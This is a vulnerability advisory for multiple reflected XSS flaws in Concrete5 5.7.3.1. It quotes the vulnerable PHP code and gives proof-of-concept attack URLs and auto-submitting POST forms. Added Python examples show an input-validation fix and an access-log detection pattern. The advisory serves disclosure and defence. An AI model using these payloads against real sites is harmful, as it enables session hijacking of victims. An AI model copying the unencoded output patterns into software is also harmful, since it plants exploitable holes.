The document describes multiple reflected cross-site scripting (XSS) vulnerabilities identified in Concrete5 version 5.7.3.1. User input passed through various request parameters was not properly sanitized before being used to generate HTML output, allowing attackers to potentially inject arbitrary JavaScript code. The vulnerabilities were addressed in Concrete5 version 5.7.4. The vulnerabilities included issues in files related to page versions, user selection, group searching, language setup, single page loading, and attribute selection.
Concrete5 Multiple Reflected XSS Advisory
Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted
Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1
Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/4
Summary
Vulnerabilities Class: Cross Site Scripting (XSS)
CVE ID: CVE-2015-4721
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable Version: 5.7.3.1 and probably prior versions
Fixed On: 5.7.4
Other References: https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description
Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.
Vulnerability Details
Following are the reflected XSS vulnerabilities identified:
File: /concrete/views/panels/details/page/versions.php (lines 5-14):
<?php foreach($_REQUEST['cvID'] as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
    <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
        <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&cID=<?php echo $_REQUEST['cID']?>" />
User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:
http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
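As an added example (not code from the advisory or from Concrete5), the output rule the fix needs, modelled in Python: cvID and cID are integers, so they are validated as such before they reach the template, while a free-text parameter such as the group search “filter” has no type to enforce and is entity-encoded instead. The template strings, the example.test host and the helper names are constructed stand-ins for the versions.php markup, not Concrete5's own code.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed mock of the two sinks in versions.php (not the Concrete5 template):
# cvID lands in an element id and an iframe src, cID in the same src, unencoded.
def render_versions_vulnerable(cvids, cid):
    out = []
    for cvid in cvids:
        out.append('<div id="ccm-tab-content-view-version-%s">' % cvid)
        out.append('<iframe src="/tools/pages/preview_version?cvID=%s&cID=%s"></iframe>'
                   % (cvid, cid))
        out.append("</div>")
    return "\n".join(out)

def as_id(value):
    """Version and page ids are integers: coerce at the trust boundary, reject the rest."""
    if not isinstance(value, str) or not value.isdecimal():
        raise ValueError("non-numeric id rejected: %r" % value)
    return int(value)

def render_versions_hardened(cvids, cid):
    """Same markup, but only validated integers reach it (and & is encoded in the attribute)."""
    cid = as_id(cid)
    out = []
    for cvid in map(as_id, cvids):
        out.append('<div id="ccm-tab-content-view-version-%d">' % cvid)
        out.append('<iframe src="/tools/pages/preview_version?cvID=%d&amp;cID=%d"></iframe>'
                   % (cvid, cid))
        out.append("</div>")
    return "\n".join(out)

def render_hidden_filter(value):
    """Free-text parameters such as 'filter' have no type to enforce, so the value is
    entity-encoded (quotes included) before it is placed in the attribute."""
    return '<input type="hidden" name="filter" value="%s" />' % html.escape(value, quote=True)

def params_from_url(url):
    """Decode a request URL the way PHP fills $_REQUEST: cvID[] becomes a list."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("cvID[]", []), q.get("cID", [""])[0]

# Constructed request shaped like the advisory's first proof-of-concept URL.
POC_URL = ("http://example.test/index.php/ccm/system/panels/details/page/versions"
           "?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--")
```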
File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):
public function selectUser($fieldName, $uID = false, $javascriptFunc …
    $selectedUID = 0;
    if (isset($_REQUEST[$fieldName])) {
        $selectedUID = $_REQUEST[$fieldName];
    } else if ($uID > 0) {
        $selectedUID = $uID;
    }
    $html = '';
    $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
    if ($selectedUID > 0) {
        $ui = UserInfo::getByID($selectedUID);
        $html .= $ui->getUserName();
    }
    $html .= '</strong></div>';
    $identifier = new \Concrete\Core\Utility\Service\Identifier();
    $selector = $identifier->getString(32);
    $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
    $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';
User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/elements/group/search.php (lines 4-20):
$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
    div[data-search=groups] form.ccm-search-fields {
        margin-left: 0px !important;
    }
</style>
<div data-search="groups">
    <script type="text/template" data-template="search-form">
        <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
            <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />
User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon
User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
URL: http://[host]/index.php/dashboard/pages/single
User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
File: /concrete/attributes/select/form.php (lines 55-60):
$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
    foreach($vals as $v) { ?>
        <div class="newAttrValue">
            <?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
            <span class="badge"><?php echo $v?></span>
User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.
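As an added example (not part of the advisory), a defender-side scan over access-log lines for the GET endpoints named in this document; the paths are the advisory's, the client addresses, timestamps and log lines are constructed. It also shows the limit of this approach: the POST-parameter sinks (msCountry, pageURL, atSelectNewOption) leave no trace of their values in an access log, so they need request-body logging or inspection at a WAF instead.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# GET endpoints from this advisory whose parameters were reflected unencoded.
# POST-only sinks (msCountry, pageURL, atSelectNewOption) never show their values
# in an access log, so this scan cannot see them: that needs body logging or a WAF.
WATCHED_PATHS = {
    "/index.php/ccm/system/panels/details/page/versions",
    "/index.php/ccm/system/panels/details/page/attributes",
    "/index.php/dashboard/users/groups",
}
# Attribute/tag break-out, or script/iframe markup, in a parameter value. Matched
# against the percent-decoded value, so %22%3E%3Cscript and "><script agree.
MARKUP_BREAK = re.compile(r"""["']\s*>|<\s*/?\s*(script|iframe)""", re.I)

def suspicious_params(request_line):
    """'GET /path?query HTTP/1.1' -> [(parameter, decoded value)] that look like XSS probes."""
    fields = request_line.split(" ")
    if len(fields) < 2 or fields[0] != "GET":
        return []
    parts = urlsplit(fields[1])
    if parts.path not in WATCHED_PATHS:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):  # percent-decodes
        if MARKUP_BREAK.search(value):
            hits.append((name, value))
    return hits

LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')  # client ... "request line"

def scan_access_log(lines):
    """Combined-log-format lines -> [(client, path, parameter)] findings."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        fields = m.group(2).split(" ")
        for name, _ in suspicious_params(m.group(2)):
            findings.append((m.group(1), urlsplit(fields[1]).path, name))
    return findings

# Constructed sample lines (placeholder clients); the first carries the advisory's PoC query.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jun/2015:10:00:01 +0000] "GET /index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [06/Jun/2015:10:00:02 +0000] "GET /index.php/dashboard/users/groups?filter=admins HTTP/1.1" 200 2048',
    '198.51.100.7 - - [06/Jun/2015:10:00:03 +0000] "POST /index.php/dashboard/pages/single HTTP/1.1" 302 0',
]
```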